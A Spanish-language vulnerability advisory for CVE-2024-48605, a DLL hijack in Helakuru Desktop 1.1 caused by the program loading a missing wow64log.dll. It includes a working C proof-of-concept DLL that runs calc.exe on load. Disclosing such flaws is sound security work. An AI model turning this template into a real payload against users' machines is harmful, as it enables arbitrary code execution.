
Helakuru Versión 1.1 DLL Hijack - CVE-2024-48605
Resumen
La versión 1.1v de Helakuru Desktop opera en arquitecturas de 64 y 32 bits. Durante las pruebas, se identificó que el programa intenta cargar wow64log.dll, que no está incluido de forma predeterminada en los sistemas operativos Windows modernos. Esto produce un error de 'Name not found' (nombre no encontrado), exponiendo al programa a una vulnerabilidad de secuestro de DLL. Al crear un wow64log.dll malicioso, se puede lograr la ejecución de código arbitrario.
Versión afectada
Helakuru Desktop 1.1v
Pasos para reproducir

#include <windows.h>
#include <stdio.h>
void LaunchCalculator()
{
STARTUPINFOA si;
PROCESS_INFORMATION pi;
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
const char* calcCmd = "C:\\Windows\\System32\\calc.exe";
if (!CreateProcessA(
NULL,
(LPSTR)calcCmd,
NULL,
NULL,
FALSE,
0,
NULL,
NULL,
&si,
&pi))
{
printf("CreateProcess failed (%d).\n", GetLastError());
}
else
{
WaitForSingleObject(pi.hProcess, INFINITE);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
}
}
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
LaunchCalculator();
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}


Impacto: Esta vulnerabilidad permite la ejecución de código arbitrario.